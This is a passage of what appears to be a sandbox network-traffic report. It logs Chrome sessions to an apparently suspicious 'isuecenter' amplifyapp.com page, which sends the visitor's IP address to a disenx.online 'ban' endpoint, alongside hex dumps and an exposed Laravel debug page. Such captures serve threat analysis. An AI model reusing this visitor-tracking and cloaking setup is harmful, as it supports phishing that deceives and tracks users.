                                          Data Ascii: s>o= W{iQ5&1.yp^M(].89Es&;;~QN,+5(AUiu;p$t1Vab?49_j/)@QeX]Id_%([:TF~Z0hyvI$JESw
                                          2024-03-25 19:07:22 UTC16384INData Raw: 5f 34 07 00 67 ae 1e 2f e9 03 1c 9e 82 ea 52 10 9c 45 06 40 d2 fc 9d 57 49 7e 8c a4 90 18 11 14 ba b4 6e dd d6 be 45 dd a1 da 18 03 e5 40 21 78 ec db 92 96 11 22 97 76 f6 79 dd e1 31 42 00 28 96 8e 65 ad 0f 98 e9 07 94 c8 9d 49 23 b3 03 37 7e 9e 12 28 75 89 a6 96 29 72 1d 42 89 9c 2e ea fe b0 ba 6d f1 cf e8 00 54 8e 9d c6 4e 1c 91 48 b6 dc 18 5a f8 37 77 4d a5 08 22 f7 c8 e4 76 50 a8 e0 91 c4 b8 d4 d5 a3 53 a9 21 14 01 00 20 9a 46 8c 4d ed 94 48 b6 dc 18 2a 78 54 b2 0f 52 04 05 54 2d d3 a9 55 d9 aa 47 eb 9b 9a 59 c5 bc c4 45 73 00 30 1b 9e a1 be 5f 33 0a ef fc 4c f0 2a cd 6f 64 eb 3e e0 9f 16 8e bc 4b f2 4b 09 11 51 5d dd d2 6b af 6f c5 bf 68 9f d7 b9 c6 b6 e6 40 21 a4 2d 94 19 e7 cd dc 2e c4 46 69 59 f6 70 3a 00 28 ea 8b 03 41 ec 1c 49 9b 29 d1 9b a7 d5
                                          Data Ascii: _4g/RE@WI~nE@!x"vy1B(eI#7~(u)rB.mTNHZ7wM"vPS! FMH*xTRT-UGYEs0_3L*od>KKQ]koh@!-.FiYp:(AI)
                                          2024-03-25 19:07:22 UTC7435INData Raw: 40 5d bb e3 8e bc c9 ce 23 44 59 46 0e f4 e9 6c 32 ec 5c db 84 cc 4c 97 5e 45 89 e2 99 d9 f9 1b ef bf 6b 33 25 80 c1 95 4e a7 9b 24 b1 8b 69 99 5c 76 f6 43 0f 3d c4 07 69 51 5d e7 da d0 2e 95 c4 55 a8 0a 7e 1e e7 ff 1f 15 00 20 3a 07 8e cf 1c 20 e6 cb 51 eb ee 53 ef 25 64 40 4d 3f 88 97 2c e9 71 f9 6c 4a c4 63 f7 0b 00 e5 2c 00 8c 5e a8 bc 2d 24 03 50 a6 b9 03 c7 ca f5 7a 42 94 c8 ed 74 1d 67 03 3b fd ef 43 ed 12 99 1e 21 54 55 48 2a 08 6f 94 9c 9d 45 80 9d c9 5a 28 69 09 21 0a 95 63 51 31 80 ba b7 ba 6b e1 cf cc fc f7 94 28 63 ca e0 3a b5 35 9d 19 43 89 97 4b a7 d3 4d 66 e2 85 f7 d2 ac e8 de 6f af af 91 01 18 7c 4f ab f9 4d 92 f6 a1 44 e9 4c ba ab a7 6b e1 0f 29 81 aa 1b 0b af 5c b8 5c d2 cf 28 51 f0 b3 f9 9d 34 00 80 e8 e4 13 7a 9f 0a 5a 8b 82 42 b9 eb
                                          Data Ascii: @]#DYFl2\L^Ek3%N$i\vC=iQ].U~ : QS%d@M?,qlJc,^-$PzBtg;C!TUH*oEZ(i!cQ1k(c:5CKMfo|OMDLk)\\(Q4zZB
                                          2024-03-25 19:07:22 UTC16384INData Raw: 00 30 6a 4d 49 76 00 44 63 c8 fa 30 c9 af 23 44 34 63 3f b9 9f d1 d8 33 87 fc a9 92 06 78 28 54 05 93 07 d7 eb 58 4f 91 02 b5 7f 74 0d 9f 24 42 81 fa 7b d9 05 10 00 4a 10 0c e4 2f 90 f4 1c 25 4a 36 24 f0 70 76 14 5f a8 7d c3 96 4f 4b 9a 40 d2 a2 e5 2d b4 73 c8 00 d4 cb 84 5e 07 50 01 00 a2 17 1a 3b 00 02 68 f4 71 a6 b1 00 b0 44 81 fb a3 54 00 10 eb 71 e6 f9 43 f5 7e db 2f b5 c8 2d a2 5b bf 9a f6 58 cf c3 0b 8d 31 d2 cb 7f 4e 52 3b 21 22 89 f9 35 65 9b 16 36 74 82 9b c6 ae 94 f4 85 7a 9e 1a d5 98 b4 9a 37 9c c6 73 13 35 2f d5 c4 02 c0 42 e5 13 23 89 00 00 c5 5b 7d ff e2 35 2e 7d 9e 12 65 f9 78 eb 84 e9 53 cb f9 02 fb 1d f6 aa a1 2e bf 80 94 25 cc 54 5c 5f 5c bd 72 e1 72 4a 00 f5 c1 25 de 98 05 80 78 0e b0 2c 00 04 d0 d8 87 41 0b 47 53 a1 34 f9 44 b0 8a 0a
                                          Data Ascii: 0jMIvDc0#D4c?3x(TXOt$B{J/%J6$pv_}OK@-s^P;hqDTqC~/-[X1NR;!"5e6tz7s5/B#[}5.}exS.%T\_\rrJ%x,AGS4D
                                          2024-03-25 19:07:22 UTC4381INData Raw: 56 77 2d fc ae a4 bb 29 51 31 43 65 fe d3 f6 f4 b4 4f 91 02 95 30 66 e2 f4 37 68 53 ff 72 99 4e aa b2 1f 2d 30 d7 37 db 0e 3f f2 50 ee 25 ec 90 db 22 22 44 f4 64 93 dd 34 6e dc 51 c3 28 81 4a ea 59 b1 f8 0f 92 e6 51 62 50 1c 12 5a f8 8f b6 09 99 99 a4 68 6c 07 4e 3e f2 a0 f5 bd 3e cf 5d e7 4a 4a 50 a4 56 cf e3 a5 30 73 b9 fe 56 9f 83 44 d5 ea e2 bf 17 da 57 6e 37 6b 65 ae 4b 73 72 1f aa f9 85 80 59 1f a6 39 03 e7 ca 72 ab e4 76 8d b8 dc 6f ad 3c 99 ce 50 b6 e9 5e 3a 00 15 72 fd 2b fa 64 fe 21 49 db 88 51 f0 80 a6 9a 7f b8 61 92 2e d1 73 7b 3e a8 b3 9e 39 56 c7 7a ed 2e 7a bf c4 47 2b db fb 33 85 bd 6b 25 ff 77 b1 e9 5f 25 c7 b5 1b b9 fc 2f 00 00 00 80 28 67 19 a1 05 a7 a9 1e 5e 41 af 1d 29 c9 6e 6b 9f 90 b9 36 93 c9 f0 81 78 c4 62 ff a9 53 47 b6 4f 98 fe
                                          Data Ascii: Vw-)Q1CeO0f7hSrN-07?P%""Dd4nQ(JYQbPZhlN>>]JJPV0sVDWn7keKsrY9rvo<P^:r+d!IQa.s{>9Vz.zG+3k%w_%/(g^A)nk6xbSGO
                                          2024-03-25 19:07:22 UTC11132INData Raw: ac 20 77 9f 78 5b 1c a8 65 cf 28 c8 bf 47 17 a6 b6 92 02 a8 63 fb 8e 9a a3 27 d7 67 24 7b 1b 31 6a 1c a3 ae 46 bb c3 37 e9 c2 04 bb a3 01 00 00 00 a8 5a 4d 2d f6 c9 fe 5e 4d 91 74 08 35 ea 60 16 2a 8d 95 fc 58 49 c7 e6 06 12 f9 f6 f4 f4 7b a4 f0 af a6 e0 ae 81 a6 fc fc 46 bd cc 6a c7 61 53 5b f3 49 cb 04 16 64 cc 35 cd e5 99 9c c2 56 b9 f1 5a 4d 95 70 b7 e3 3a 26 66 96 ac 5e de 79 33 35 1a 43 be c5 7f 1a f4 6a 93 a4 61 d4 a8 6a 81 a4 b4 a4 b4 bb 7f d2 e4 7a 56 2d b9 b6 74 e6 c1 c0 b4 dc 5d 0f 4b fe 68 60 c1 a3 b9 40 8f ef b1 35 b1 f6 a1 87 ee de 54 a9 1f ee e0 4c 66 f8 b6 ad e1 88 44 c2 86 5b de 47 28 48 b4 ba f9 68 b9 0e 30 e9 00 97 46 bb 34 c6 a4 83 5c 6a 71 49 f6 fc c2 3e df 7e f0 e1 1e 8e 41 73 8b 4e e9 ef d5 eb 25 8d a1 46 c3 48 48 7a 85 5c af 70 e9
                                          Data Ascii: wx[e(Gc'g${1jF7ZM-^Mt5`*XI{FjaS[Id5VZMp:&f^y35CjajzV-t]Kh`@5TLfD[G(Hh0F4\jqI>~AsN%FHHz\p


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          20192.168.2.649729198.54.126.1154435940C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:21 UTC350OUTGET /api/fetch/ban HTTP/1.1
                                          Host: disenx.online
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-03-25 19:07:22 UTC346INHTTP/1.1 405 Method Not Allowed
                                          keep-alive: timeout=5, max=100
                                          x-powered-by: PHP/8.0.30
                                          allow: POST
                                          cache-control: no-cache, private
                                          access-control-allow-origin: *
                                          content-type: text/html; charset=UTF-8
                                          transfer-encoding: chunked
                                          date: Mon, 25 Mar 2024 19:07:22 GMT
                                          server: LiteSpeed
                                          x-turbo-charged-by: LiteSpeed
                                          connection: close
                                          2024-03-25 19:07:22 UTC16038INData Raw: 46 41 33 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 61 75 74 6f 22 3e 0a 3c 21 2d 2d 0a 53 79 6d 66 6f 6e 79 5c 43 6f 6d 70 6f 6e 65 6e 74 5c 48 74 74 70 4b 65 72 6e 65 6c 5c 45 78 63 65 70 74 69 6f 6e 5c 4d 65 74 68 6f 64 4e 6f 74 41 6c 6c 6f 77 65 64 48 74 74 70 45 78 63 65 70 74 69 6f 6e 3a 20 54 68 65 20 47 45 54 20 6d 65 74 68 6f 64 20 69 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 20 66 6f 72 20 74 68 69 73 20 72 6f 75 74 65 2e 20 53 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 73 3a 20 50 4f 53 54 2e 20 69 6e 20 66 69 6c 65 20 2f 68 6f 6d 65 2f 64 69 73 65 72 63 6f 71 2f 70 75 62 6c 69 63 5f 68 74 6d 6c 2f 76 65 6e 64 6f 72 2f 6c 61 72 61 76 65 6c 2f 66 72 61 6d 65
                                          Data Ascii: FA32<!DOCTYPE html><html lang="en" class="auto">...Symfony\Component\HttpKernel\Exception\MethodNotAllowedHttpException: The GET method is not supported for this route. Supported methods: POST. in file /home/disercoq/public_html/vendor/laravel/frame
                                          2024-03-25 19:07:22 UTC16384INData Raw: 6d 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 70 72 65 2e 73 66 2d 64 75 6d 70 20 2e 73 66 2d 64 75 6d 70 2d 73 65 61 72 63 68 2d 77 72 61 70 70 65 72 3e 2e 73 66 2d 64 75 6d 70 2d 73 65 61 72 63 68 2d 69 6e 70 75 74 2d 6e 65 78 74 2c 70 72 65 2e 73 66 2d 64 75 6d 70 20 2e 73 66 2d 64 75 6d 70 2d 73 65 61 72 63 68 2d 77 72 61 70 70 65 72 3e 2e 73 66 2d 64 75 6d 70 2d 73 65 61 72 63 68 2d 69 6e 70 75 74 2d 70 72 65 76 69 6f 75 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 2d 74 77 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 3a 31 3b 63 6f 6c 6f 72 3a 72 67 62 28 31 30 37 20 31 31 34 20 31 32 38 2f 76 61
                                          Data Ascii: m!important;padding-right:.5rem!important}pre.sf-dump .sf-dump-search-wrapper>.sf-dump-search-input-next,pre.sf-dump .sf-dump-search-wrapper>.sf-dump-search-input-previous{background-color:transparent!important;--tw-text-opacity:1;color:rgb(107 114 128/va
                                          2024-03-25 19:07:22 UTC16384INData Raw: 3a 2e 37 35 72 65 6d 7d 2e 67 61 70 2d 70 78 7b 67 72 69 64 2d 67 61 70 3a 31 70 78 3b 67 61 70 3a 31 70 78 7d 2e 67 61 70 2d 31 7b 67 72 69 64 2d 67 61 70 3a 2e 32 35 72 65 6d 3b 67 61 70 3a 2e 32 35 72 65 6d 7d 2e 67 61 70 2d 79 2d 32 7b 67 72 69 64 2d 72 6f 77 2d 67 61 70 3a 2e 35 72 65 6d 3b 72 6f 77 2d 67 61 70 3a 2e 35 72 65 6d 7d 2e 73 70 61 63 65 2d 78 2d 70 78 3e 3a 6e 6f 74 28 5b 68 69 64 64 65 6e 5d 29 7e 3a 6e 6f 74 28 5b 68 69 64 64 65 6e 5d 29 7b 2d 2d 74 77 2d 73 70 61 63 65 2d 78 2d 72 65 76 65 72 73 65 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 63 61 6c 63 28 31 70 78 2a 76 61 72 28 2d 2d 74 77 2d 73 70 61 63 65 2d 78 2d 72 65 76 65 72 73 65 29 29 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 63 61 6c 63 28 31 70 78 2a 28 31 20 2d 20 76 61
                                          Data Ascii: :.75rem}.gap-px{grid-gap:1px;gap:1px}.gap-1{grid-gap:.25rem;gap:.25rem}.gap-y-2{grid-row-gap:.5rem;row-gap:.5rem}.space-x-px>:not([hidden])~:not([hidden]){--tw-space-x-reverse:0;margin-right:calc(1px*var(--tw-space-x-reverse));margin-left:calc(1px*(1 - va
                                          2024-03-25 19:07:22 UTC16384INData Raw: 64 4e 6f 74 41 6c 6c 6f 77 65 64 48 74 74 70 45 78 63 65 70 74 69 6f 6e 22 2c 22 31 31 35 22 3a 22 20 20 20 20 20 2a 5c 2f 22 2c 22 31 31 36 22 3a 22 20 20 20 20 70 72 6f 74 65 63 74 65 64 20 66 75 6e 63 74 69 6f 6e 20 6d 65 74 68 6f 64 4e 6f 74 41 6c 6c 6f 77 65 64 28 61 72 72 61 79 20 24 6f 74 68 65 72 73 2c 20 24 6d 65 74 68 6f 64 29 22 2c 22 31 31 37 22 3a 22 20 20 20 20 7b 22 2c 22 31 31 38 22 3a 22 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 4d 65 74 68 6f 64 4e 6f 74 41 6c 6c 6f 77 65 64 48 74 74 70 45 78 63 65 70 74 69 6f 6e 28 22 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 5f 66 72 61 6d 65 22 3a 66 61 6c 73 65 7d 2c 7b 22 66 69 6c 65 22 3a 22 5c 2f 68 6f 6d 65 5c 2f 64 69 73 65 72 63 6f 71 5c 2f 70 75 62 6c 69 63 5f 68 74 6d 6c 5c 2f 76
                                          Data Ascii: dNotAllowedHttpException","115":" *\/","116":" protected function methodNotAllowed(array $others, $method)","117":" {","118":" throw new MethodNotAllowedHttpException("},"application_frame":false},{"file":"\/home\/disercoq\/public_html\/v
                                          2024-03-25 19:07:22 UTC16384INData Raw: 42 46 46 38 0d 0a 20 72 65 74 75 72 6e 20 70 61 72 65 6e 74 3a 3a 68 61 6e 64 6c 65 28 24 72 65 71 75 65 73 74 2c 20 24 6e 65 78 74 29 3b 22 2c 22 34 31 22 3a 22 20 20 20 20 7d 22 2c 22 34 32 22 3a 22 22 2c 22 34 33 22 3a 22 20 20 20 20 5c 2f 2a 2a 22 2c 22 34 34 22 3a 22 20 20 20 20 20 2a 20 54 72 61 6e 73 66 6f 72 6d 20 74 68 65 20 67 69 76 65 6e 20 76 61 6c 75 65 2e 22 2c 22 34 35 22 3a 22 20 20 20 20 20 2a 22 2c 22 34 36 22 3a 22 20 20 20 20 20 2a 20 40 70 61 72 61 6d 20 20 73 74 72 69 6e 67 20 20 24 6b 65 79 22 2c 22 34 37 22 3a 22 20 20 20 20 20 2a 20 40 70 61 72 61 6d 20 20 6d 69 78 65 64 20 20 24 76 61 6c 75 65 22 2c 22 34 38 22 3a 22 20 20 20 20 20 2a 20 40 72 65 74 75 72 6e 20 6d 69 78 65 64 22 2c 22 34 39 22 3a 22 20 20 20 20 20 2a 5c 2f 22 2c
                                          Data Ascii: BFF8 return parent::handle($request, $next);","41":" }","42":"","43":" \/**","44":" * Transform the given value.","45":" *","46":" * @param string $key","47":" * @param mixed $value","48":" * @return mixed","49":" *\/",
                                          2024-03-25 19:07:22 UTC16384INData Raw: 20 20 24 70 69 70 65 6c 69 6e 65 20 3d 20 61 72 72 61 79 5f 72 65 64 75 63 65 28 22 2c 22 31 31 33 22 3a 22 20 20 20 20 20 20 20 20 20 20 20 20 61 72 72 61 79 5f 72 65 76 65 72 73 65 28 24 74 68 69 73 2d 5c 75 30 30 33 45 70 69 70 65 73 28 29 29 2c 20 24 74 68 69 73 2d 5c 75 30 30 33 45 63 61 72 72 79 28 29 2c 20 24 74 68 69 73 2d 5c 75 30 30 33 45 70 72 65 70 61 72 65 44 65 73 74 69 6e 61 74 69 6f 6e 28 24 64 65 73 74 69 6e 61 74 69 6f 6e 29 22 2c 22 31 31 34 22 3a 22 20 20 20 20 20 20 20 20 29 3b 22 2c 22 31 31 35 22 3a 22 22 2c 22 31 31 36 22 3a 22 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 24 70 69 70 65 6c 69 6e 65 28 24 74 68 69 73 2d 5c 75 30 30 33 45 70 61 73 73 61 62 6c 65 29 3b 22 2c 22 31 31 37 22 3a 22 20 20 20 20 7d 22 2c 22 31 31 38 22 3a
                                          Data Ascii: $pipeline = array_reduce(","113":" array_reverse($this-\u003Epipes()), $this-\u003Ecarry(), $this-\u003EprepareDestination($destination)","114":" );","115":"","116":" return $pipeline($this-\u003Epassable);","117":" }","118":
                                          2024-03-25 19:07:22 UTC16384INData Raw: 61 70 70 2d 5c 75 30 30 33 45 68 61 73 42 65 65 6e 42 6f 6f 74 73 74 72 61 70 70 65 64 28 29 29 20 7b 22 2c 22 31 35 33 22 3a 22 20 20 20 20 20 20 20 20 20 20 20 20 24 74 68 69 73 2d 5c 75 30 30 33 45 61 70 70 2d 5c 75 30 30 33 45 62 6f 6f 74 73 74 72 61 70 57 69 74 68 28 24 74 68 69 73 2d 5c 75 30 30 33 45 62 6f 6f 74 73 74 72 61 70 70 65 72 73 28 29 29 3b 22 2c 22 31 35 34 22 3a 22 20 20 20 20 20 20 20 20 7d 22 2c 22 31 35 35 22 3a 22 20 20 20 20 7d 22 2c 22 31 35 36 22 3a 22 22 2c 22 31 35 37 22 3a 22 20 20 20 20 5c 2f 2a 2a 22 2c 22 31 35 38 22 3a 22 20 20 20 20 20 2a 20 47 65 74 20 74 68 65 20 72 6f 75 74 65 20 64 69 73 70 61 74 63 68 65 72 20 63 61 6c 6c 62 61 63 6b 2e 22 2c 22 31 35 39 22 3a 22 20 20 20 20 20 2a 22 2c 22 31 36 30 22 3a 22 20 20 20
                                          Data Ascii: app-\u003EhasBeenBootstrapped()) {","153":" $this-\u003Eapp-\u003EbootstrapWith($this-\u003Ebootstrappers());","154":" }","155":" }","156":"","157":" \/**","158":" * Get the route dispatcher callback.","159":" *","160":"
                                          2024-03-25 19:07:22 UTC16384INData Raw: 33 42 36 42 0d 0a 39 22 3a 22 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 70 69 70 65 20 3d 20 24 74 68 69 73 2d 5c 75 30 30 33 45 67 65 74 43 6f 6e 74 61 69 6e 65 72 28 29 2d 5c 75 30 30 33 45 6d 61 6b 65 28 24 6e 61 6d 65 29 3b 22 2c 22 31 37 30 22 3a 22 22 2c 22 31 37 31 22 3a 22 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 70 61 72 61 6d 65 74 65 72 73 20 3d 20 61 72 72 61 79 5f 6d 65 72 67 65 28 5b 24 70 61 73 73 61 62 6c 65 2c 20 24 73 74 61 63 6b 5d 2c 20 24 70 61 72 61 6d 65 74 65 72 73 29 3b 22 2c 22 31 37 32 22 3a 22 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 22 2c 22 31 37 33 22 3a 22 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                          Data Ascii: 3B6B9":" $pipe = $this-\u003EgetContainer()-\u003Emake($name);","170":"","171":" $parameters = array_merge([$passable, $stack], $parameters);","172":" } else {","173":"
                                          2024-03-25 19:07:22 UTC16384INData Raw: 46 42 34 32 0d 0a 64 4e 6f 74 41 6c 6c 6f 77 65 64 28 29 0a 23 31 20 2f 68 6f 6d 65 2f 64 69 73 65 72 63 6f 71 2f 70 75 62 6c 69 63 5f 68 74 6d 6c 2f 76 65 6e 64 6f 72 2f 6c 61 72 61 76 65 6c 2f 66 72 61 6d 65 77 6f 72 6b 2f 73 72 63 2f 49 6c 6c 75 6d 69 6e 61 74 65 2f 52 6f 75 74 69 6e 67 2f 41 62 73 74 72 61 63 74 52 6f 75 74 65 43 6f 6c 6c 65 63 74 69 6f 6e 2e 70 68 70 28 34 31 29 3a 20 49 6c 6c 75 6d 69 6e 61 74 65 5c 52 6f 75 74 69 6e 67 5c 41 62 73 74 72 61 63 74 52 6f 75 74 65 43 6f 6c 6c 65 63 74 69 6f 6e 2d 26 67 74 3b 67 65 74 52 6f 75 74 65 46 6f 72 4d 65 74 68 6f 64 73 28 29 0a 23 32 20 2f 68 6f 6d 65 2f 64 69 73 65 72 63 6f 71 2f 70 75 62 6c 69 63 5f 68 74 6d 6c 2f 76 65 6e 64 6f 72 2f 6c 61 72 61 76 65 6c 2f 66 72 61 6d 65 77 6f 72 6b 2f 73
                                          Data Ascii: FB42dNotAllowed()#1 /home/disercoq/public_html/vendor/laravel/framework/src/Illuminate/Routing/AbstractRouteCollection.php(41): Illuminate\Routing\AbstractRouteCollection-&gt;getRouteForMethods()#2 /home/disercoq/public_html/vendor/laravel/framework/s
                                          2024-03-25 19:07:22 UTC16384INData Raw: 65 20 76 61 6c 75 65 20 77 69 74 68 69 6e 20 74 68 65 20 63 68 69 6c 64 20 63 6f 6d 70 6f 6e 65 6e 74 2c 20 79 6f 75 20 73 68 6f 75 6c 64 20 70 61 73 73 20 69 74 20 61 73 20 61 20 64 69 66 66 65 72 65 6e 74 20 70 72 6f 70 2e 20 28 68 74 74 70 73 3a 2f 2f 72 65 61 63 74 6a 73 2e 6f 72 67 2f 6c 69 6e 6b 2f 73 70 65 63 69 61 6c 2d 70 72 6f 70 73 29 22 2c 74 29 29 7d 3b 6e 2e 69 73 52 65 61 63 74 57 61 72 6e 69 6e 67 3d 21 30 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 22 6b 65 79 22 2c 7b 67 65 74 3a 6e 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 2c 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 48 7c 7c 28 48 3d 21 30 2c 77 28 22 25 73 3a 20 60 72 65 66 60 20 69 73
                                          Data Ascii: e value within the child component, you should pass it as a different prop. (https://reactjs.org/link/special-props)",t))};n.isReactWarning=!0,Object.defineProperty(e,"key",{get:n,configurable:!0})}function K(e,t){var n=function(){H||(H=!0,w("%s: `ref` is


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          21192.168.2.649730198.54.126.1154435940C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:22 UTC685OUTPOST /api/fetch/ban HTTP/1.1
                                          Host: disenx.online
                                          Connection: keep-alive
                                          Content-Length: 22
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          Accept: application/json, text/plain, */*
                                          Content-Type: application/json
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Origin: https://isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Referer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-03-25 19:07:22 UTC22OUTData Raw: 7b 22 69 70 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 7d
                                          Data Ascii: {"ip":"102.165.48.43"}
                                          2024-03-25 19:07:22 UTC358INHTTP/1.1 200 OK
                                          keep-alive: timeout=5, max=100
                                          x-powered-by: PHP/8.0.30
                                          content-type: text/html; charset=UTF-8
                                          cache-control: no-cache, private
                                          x-ratelimit-limit: 60
                                          x-ratelimit-remaining: 58
                                          access-control-allow-origin: *
                                          content-length: 0
                                          date: Mon, 25 Mar 2024 19:07:22 GMT
                                          server: LiteSpeed
                                          x-turbo-charged-by: LiteSpeed
                                          connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          22192.168.2.64973113.249.39.104435940C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:22 UTC634OUTGET /favicon.ico HTTP/1.1
                                          Host: isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-03-25 19:07:22 UTC538INHTTP/1.1 200 OK
                                          Content-Type: image/vnd.microsoft.icon
                                          Content-Length: 5430
                                          Connection: close
                                          Date: Mon, 25 Mar 2024 19:07:22 GMT
                                          Server: AmazonS3
                                          Accept-Ranges: bytes
                                          ETag: "de76b0c210c815ef282d5b59de8a0567"
                                          Last-Modified: Mon, 25 Mar 2024 18:38:44 GMT
                                          Cache-Control: public, max-age=0, s-maxage=2
                                          X-Cache: Miss from cloudfront
                                          Via: 1.1 5c91d033409cd7607633594f94b09064.cloudfront.net (CloudFront)
                                          X-Amz-Cf-Pop: IAD89-C1
                                          Alt-Svc: h3=":443"; ma=86400
                                          X-Amz-Cf-Id: TkczpTrEFCNb9ixpeGjSaWJE234l6PWXQwvm2V8NMJAoRsNnpEIQvg==
                                          2024-03-25 19:07:22 UTC5430INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e1 65 06 2b e2 66 02 8f e1 66 01 d5 ff ff ff ff ff ff ff ff e1 65 00 d5 e2 66 00 8f e1 6b 06 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 80 2b 06 e3 69 03 94 e4 6b 03 fd e3 69 02 ff e3 69 02 ff ff ff ff ff ff ff ff ff e3 69 02 ff e3 69 02 ff e4 6a 03 fd e3 69 03 94 ff 80 2b 06 00 00 00 00 00 00 00 00 00 00 00 00 ff 80 2b 06 e5 6f 04 bd e5 6e 04 ff e5 6e 04 ff e5 6e 04 ff e5 6e 04 ff ff ff ff ff ff ff ff ff e5 6e 04 ff e5 6e 04 ff e5 6e 04 ff e5
                                          Data Ascii: h& ( e+ffefk++ikiiiiji++onnnnnnn


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          23192.168.2.64973252.48.38.994435940C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:23 UTC666OUTOPTIONS /pusher/app/0d3b34df0b6b9220c260/265/cis4qcvf/xhr_streaming?protocol=7&client=js&version=8.0.2&t=1711393641468&n=1 HTTP/1.1
                                          Host: sockjs-eu.pusher.com
                                          Connection: keep-alive
                                          Accept: */*
                                          Access-Control-Request-Method: POST
                                          Access-Control-Request-Headers: content-type
                                          Origin: https://isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Dest: empty
                                          Referer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-03-25 19:07:23 UTC487INHTTP/1.1 204 No Content
                                          access-control-allow-origin: https://isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          vary: Origin
                                          access-control-allow-headers: content-type
                                          access-control-allow-credentials: true
                                          cache-control: public, max-age=31536000
                                          expires: Tue, 25 Mar 2025 19:07:23 GMT
                                          access-control-allow-methods: OPTIONS, POST
                                          access-control-max-age: 31536000
                                          date: Mon, 25 Mar 2024 19:07:23 GMT
                                          keep-alive: timeout=5
                                          strict-transport-security: max-age=15768000
